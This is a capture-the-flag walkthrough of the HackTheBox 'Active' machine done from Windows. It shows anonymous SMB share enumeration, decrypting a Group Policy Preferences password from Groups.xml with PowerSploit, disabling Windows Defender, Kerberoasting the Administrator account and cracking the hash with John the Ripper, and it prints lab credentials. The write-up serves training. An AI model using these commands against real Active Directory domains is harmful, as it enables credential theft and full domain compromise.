Hackthebox Writeup — “Active” using only Windows
I spend some time on hackthebox, both for pure fun and for the training. After completing the retired box “Active” on hackthebox, I thought it would be interesting to solve the box again using only Windows, instead of using Kali Linux as I usually do, and document it with a walkthrough.
The tools I used were the dev branch of PowerSploit, the latest automated build of John the Ripper jumbo, nmap for Windows and Sysinternals PsExec.
As Windows Defender flags parts of PowerSploit, the first step is to disable Real time detection in Windows Defender before loading the Powersploit module. Remember to re-enable Windows Defender afterwards, as running Windows without anti virus is a Bad Idea™
First we load the PowerSploit module using the Import-Module command, supplying the full path to PowerSploit.psm1 (Ignore the error message about the git directory):
After loading PowerSploit, our first step is to perform a port scan, using nmap for Windows:
We see what looks like a Active Directory domain controller for the domain active.htb, running Windows Server 2008 R2 SP1
Let’s first look if we can find something on the SMB server. If we just try to browse the server in a Windows Explorer window we are asked for a username and password. To see if we can browse any shares anonymously we have to create a null session in the console using the net use command, then view the shares using net view(this command had to be executed in a cmd console, when attempting it in a powershell console an error message was displayed):
C:\Users\vegard>net use \\10.10.10.100\ipc$ "" /user:""
The command completed successfully.C:\Users\vegard>net view \\10.10.10.100
Shared resources at \\10.10.10.100Domain ControllerShare name Type Used as Comment-------------------------------------------------------------------------------
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
The command completed successfully.
After creating the null session, we can also browse the shares using Windows Explorer, and we see that we have access to the Replication share:
We can also enumerate the share using the command line, and find the file Groups.xml:
C:\Users\vegard>dir /s /b \\10.10.10.100\Replication
\\10.10.10.100\Replication\active.htb
\\10.10.10.100\Replication\active.htb\Policies
\\10.10.10.100\Replication\active.htb\scripts
\\10.10.10.100\Replication\active.htb\DfsrPrivate\ConflictAndDeleted
\\10.10.10.100\Replication\active.htb\DfsrPrivate\Deleted
\\10.10.10.100\Replication\active.htb\DfsrPrivate\Installing
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
\\10.10.10.100\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
\\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
\\10.10.10.100\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI
\\10.10.10.100\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE
\\10.10.10.100\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\USER
\\10.10.10.100\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft
\\10.10.10.100\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT
\\10.10.10.100\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
\\10.10.10.100\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.infC:\Users\vegard>type \\10.10.10.100\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
For decrypting GGP passwords, PowerSploit have a function called Get-GPPPassword that searches the domain controller and decrypts any passwords it finds. Get-GPPPassword won’t work here since we are not joined to the domain, but looking at the source code we find the internal function that does the decryption:
After pasting the function definition into the PowerShell console, Get-DecryptedPassword can be used to decrypt the password:
And we got a set of creds, username active.htb\SVC_TGS and password GPPstillStandingStrong2k18.
To use the new creds for SMB, we first delete the null session using the following command in a cmd console: net use \\10.10.10.100\ipc$ /delete, and then browse to \\10.10.10.100 in windows explorer, entering the creds when asked for username and password. Having done that, we can browse the \\10.10.10.100\Users share and find the users.txt file:
After getting user.txt I poked around in the Users share, looking for anything to help me with with privilege escalation and getting root.txt, but didn’t find anything special. Since we a dealing with an AD domain controller, my next step was to try Kerberoasting, using Invoke-Kerberoast from PowerSploit.
My first try was to start PowerShell with the network credentials ofactive.htb\SVC_TGS using runas /netonly, and then run Invoke-Kerberoast, but that failed with an error message about being unable to create a Kerberos Credential:
After some googling, it looked like the error was because Windows uses only NTLM instead of Kerberos when the computer is not domain joined, but that one could force Kerberos usage for a realm using the ksetup command as Administrator.
So we open an Administrator console and enter the following commands, and then reboot:
ksetup /addkdc ACTIVE.HTB 10.10.10.100
ksetup /setrealm ACTIVE.HTB
After rebooting and re-disabling Windows Defender, we try the Kerberoasting again, and get a hash for administrator:
To attempt cracking the hash using JtR jumbo, we copy it to a text file, removing all whitespace and line breaks, and also removing the text ":445", as john uses colons as field separators, so the hash won’t load with the colon there. John is then executed with:
C:\john\run\john.exe --wordlist=rockyou.txt kerberoast.txt
We managed to crack the Administrator password, and got the Administrator creds: active.htb\Administrator:Ticketmaster1968.
Using the Administrator creds we can either browse \\10.10.10.100\Users to get root txt, or use psexec to get a shell and list the file.
To remove your Windows box from the ACTIVE.HTB kerberos realm when you are finished, execute the following command as Administrator and reboot:
ksetup /removerealm ACTIVE.HTB
